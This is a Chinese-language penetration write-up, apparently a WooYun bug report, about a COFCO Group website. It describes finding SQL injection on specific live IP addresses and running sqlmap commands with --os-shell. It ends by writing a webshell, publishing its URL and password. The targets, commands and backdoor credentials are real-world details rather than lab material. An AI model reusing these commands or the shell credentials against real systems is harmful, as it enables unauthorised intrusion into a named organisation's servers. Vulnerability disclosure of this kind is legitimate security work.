一次成功的对中粮集团某网站的fuzz测试大量sql注入加getshell

网站没有内容如何拿站呢、幸亏我没有放弃 差点就提交了 又一发test.php引发的血案、审核大哥求 首页 中粮大哥求20

https://wooyun.org/bugs/wooyun-2015-0157025 看到这个test.php 新生感触啊、、于是我又来了

这次直接上御剑
 

平常收集的字典果然没让我失望、、 首先找到了一枚xss 不过仅仅是输出 没什么卵用
 

接着又找到这个

https://219.143.252.114/left.php

https://219.143.252.114/main.php

https://219.143.252.114/main.php?item=%B5%D8%B2%FA%BE%C6%B5%EA&data_id=2861
 

https://219.143.252.114/main.php?item=%BD%F0%C8%DA&data_id=296 and 1=1

https://219.143.252.114/main.php?item=%BD%F0%C8%DA&data_id=296 and 1=2 返回不同 有注入

这就给我来了几分信心 接着 又找到枚注入

C:\Python27\sqlmap>sqlmap.py -u "https://219.143.252.114/mrjx_list.php?month=9"
 

mssql dba sa权限 11个数据库 不支持stack_query 所以不能os-shell 顿时伤感的一地

这里提醒一下大家 有的时候不支持stack_query可能是sqlmap的缘故 我上次就遇到过一个 所以再次遇见这样的大家可以换换sqlmap 跑跑试试

当然 我这里没有成功....因为不支持union 所以也没有往读文件上想 因为mysql不支持union是不可以读取文件的、 不过我想想 这是mssql+php 试了下 读不出来 放弃了这条路

对常见端口进行扫描 没准连上1433呢 结果就扫出来一个80端口
 

就一个80 愁人 那么这条路好像也断了、心里哇凉哇凉的、、就个sql注入 前面提交都是4rank我也不想提交了、思路又断了

这时候lijiejie的神器又发挥作用了
 

看见没 俩个database/
 

嘿嘿 基本可以确定是一套程序 上sqlmap

sqlmap.py -u "https://219.143.252.159/mrjx_list.php?month=9*" --os-shell

这个是2000的数据库 通用是dba sa 权限 不过这个可以执行os-shell 哈哈
 

由于前面的报错 路径很容易找到 没有回显 又有点凉、
 

写入txt 写入成功哈哈 于是开始写shell
 

去网站测试了下 写入成功 哈哈
 

拿下shell 到此为止啦

https://219.143.252.159/whynot.php whynot66

删除没用的东西 还有俩次运气都很好 哈哈